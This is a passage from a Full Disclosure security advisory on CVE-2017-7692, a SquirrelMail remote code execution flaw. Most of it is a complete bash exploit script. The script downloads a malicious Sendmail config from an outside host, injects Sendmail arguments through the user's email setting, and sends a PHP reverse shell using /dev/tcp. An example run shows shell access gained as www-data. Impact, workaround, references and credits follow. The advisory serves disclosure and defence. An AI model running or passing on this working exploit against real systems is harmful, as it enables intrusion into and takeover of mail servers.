# .':odx.ckxl,.
# .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------
sqspool="/var/spool/squirrelmail/attach/"
echo -e "$int"
#echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit
(CVE-2017-7692) \n"
#echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n"
#echo -e "Discovered and coded by: \n\nDawid Golunski
\nhttps://legalhackers.com \033[0m\n\n"
# Base URL
if [ $# -ne 1 ]; then
echo -e "Usage: \n$0 SquirrelMail_URL"
echo -e "Example: \n$0 http://target/squirrelmail/ \n"
exit 2
fi
URL="$1"
# Log in
echo -e "\n[*] Enter SquirrelMail user credentials"
read -p "user: " squser
read -sp "pass: " sqpass
echo -e "\n\n[*] Logging in to SquirrelMail at $URL"
curl -s -D /tmp/sqdata
-d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1"
$URL/src/redirect.php | grep -q incorrect
if [ $? -eq 0 ]; then
echo "Invalid creds"
exit 2
fi
sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';'
-f1`"
keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
# Prepare Sendmail cnf
#
# * The config will launch php via the following stanza:
#
# Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL,
R=EnvToL/HdrToL,
# T=DNS/RFC822/X-Unix,
# A=php -- $u $h ${client_addr}
#
wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf
# Upload config
echo -e "\n\n[*] Uploading Sendmail config"
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid"
"$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk
-F'value="' '{print $2}' | cut -d'"' -f1 `"
attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid"
-F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test"
-F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add"
$URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}'
| tr -d '\n'`"
if [ ${#attachid} -lt 32 ]; then
echo "Something went wrong. Failed to upload the sendmail file."
exit 2
fi
# Create Sendmail cmd string according to selected payload
echo -e "\n\n[?] Select payload\n"
# SELECT PAYLOAD
echo "1 - File write (into /tmp/sqpoc)"
echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"
echo
read -p "[1-2] " pchoice
case $pchoice in
1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc"
;;
2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid"
;;
esac
if [ $pchoice -eq 2 ]; then
echo
read -p "Reverese shell IP: " reverse_ip
read -p "Reverese shell PORT: " reverse_port
fi
# Reverse shell code
phprevsh="
<?php
\$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port
0<&1 2>&1 & '\";
file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export
TERM=vt100 ;' . \$cmd);
system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");
?>"
# Set sendmail params in user settings
echo -e "\n[*] Injecting Sendmail command parameters"
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid"
"$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="'
'{print $2}' | cut -d'"' -f1 `"
curl -s -b"SQMSESSID=$sessid; key=$keyid" -d
"smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit"
--data-urlencode "new_email_address=$payload"
"$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null
if [ $? -ne 0 ]; then
echo "Failed to inject sendmail parameters"
exit 2
fi
# Send email which triggers the RCE vuln and runs phprevsh
echo -e "\n[*] Sending the email to trigger the vuln"
(sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid"
-d"smtoken=$token" -d"startMessage=1" -d"session=0" \
-d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh"
-d"send=Send" -d"username=$squser" $URL/src/compose.php) &
if [ $pchoice -eq 2 ]; then
echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"
nc -vv -l -p $reverse_port
else
echo -e "\n[*] The test file should have been written at /tmp/sqpoc"
fi
grep -q "302 Found" /tmp/sheaders
if [ $? -eq 1 ]; then
echo "There was a problem with sending email"
exit 2
fi
# Done
echo -e "\n[*] All done. Exiting"
-------[ EOF ]--------
Example run:
~~~~~~~~~~~~~
$ ./SquirrelMail_RCE_exploit.sh http://xenial/squirrelmail/
__ __ __ __ __
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
/____/
SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692)
SquirrelMail_RCE_exploit.sh (ver. 1.0)
Discovered and coded by
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
ExploitBox project:
https://ExploitBox.io
[*] Enter SquirrelMail user credentials
user: attacker
pass:
[*] Logging in to SquirrelMail at http://xenial/squirrelmail/
[*] Uploading Sendmail config
[?] Select payload
1 - File write (into /tmp/sqpoc)
2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)
[1-2] 2
Reverese shell IP: 192.168.57.1
Reverese shell PORT: 1337
[*] Injecting Sendmail command parameters
[*] Sending the email to trigger the vuln
[*] Waiting for shell on 192.168.57.1 port 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.57.3] port 1337 [tcp/*] accepted (family 2, sport
60608)
bash: cannot set terminal process group (12208): Inappropriate ioctl for device
bash: no job control in this shell
www-data@vulnsys:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@vulnsys:/tmp$ dpkg -l | grep squirrelmail
dpkg -l | grep squirrelmail
ii squirrelmail 2:1.4.23~svn20120406-2ubuntu1.16.04.1
all Webmail for nuts
www-data@vulnsys:/tmp$ exit
exit
exit
[*] All done. Exiting
Video PoC:
~~~~~~~~~~~~~
https://legalhackers.com/videos/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
VI. BUSINESS IMPACT
-------------------------
A successful exploitation could let remote attackers to gain access to
the target server in the context of the web server account which could
lead to a full compromise of the web application.
VII. SYSTEMS AFFECTED
-------------------------
The latest version of SquirrelMail 1.4.23 and below are affected.
VIII. SOLUTION / VENDOR RESPONSE
-------------------------
The vulnerability was first reported to SquirrelMail vendor by the
author of this advisory which resulted in CVE-ID (2017-5181) issued on 4th
January. The vendor requested more time due to personal issues.
The vulnerability was however discovered and published in April by another
researcher on full-disclosure list which triggered the release
of this advisory without an official solution available.
As a temporary solution users can switch to SMTP based transport (as
opposed to Sendmail).
As advised by MITRE, this vulnerability should now be tracked under the
new CVEID - CVE-2017-7692.
Vendor has been advised that the isue is now public. No response has been
received yet.
IX. REFERENCES
-------------------------
https://legalhackers.com
https://ExploitBox.io
This / CVE-2017-7692 advisory URL:
https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
Video PoC exploit:
https://legalhackers.com/videos/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
Exploit code:
The simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh
https://legalhackers.com/exploits/sendmail-exploit.cnf
CVE-2017-7692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7692
Vendor site:
https://squirrelmail.org
Related OSS-SECURITY /full-disclosure messages:
http://seclists.org/fulldisclosure/2017/Apr/89
http://www.openwall.com/lists/oss-security/2017/04/19/7
Similar vulnerabilities discovered by the author (PHPMailer & SwiftMailer):
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
X. CREDITS
-------------------------
The vulnerability was first discovered/reported by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com
Filippo Cavallarin, who also reported the vulnerability at a later date
(see the oss-security thread referenced below for details)
XI. REVISION HISTORY
-------------------------
22.04.2017 - Advisory released
24.04.2017 - Revision 2.0 (updated references and SquirrelMail
version to 1.4.23 which is still vulnerable)
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/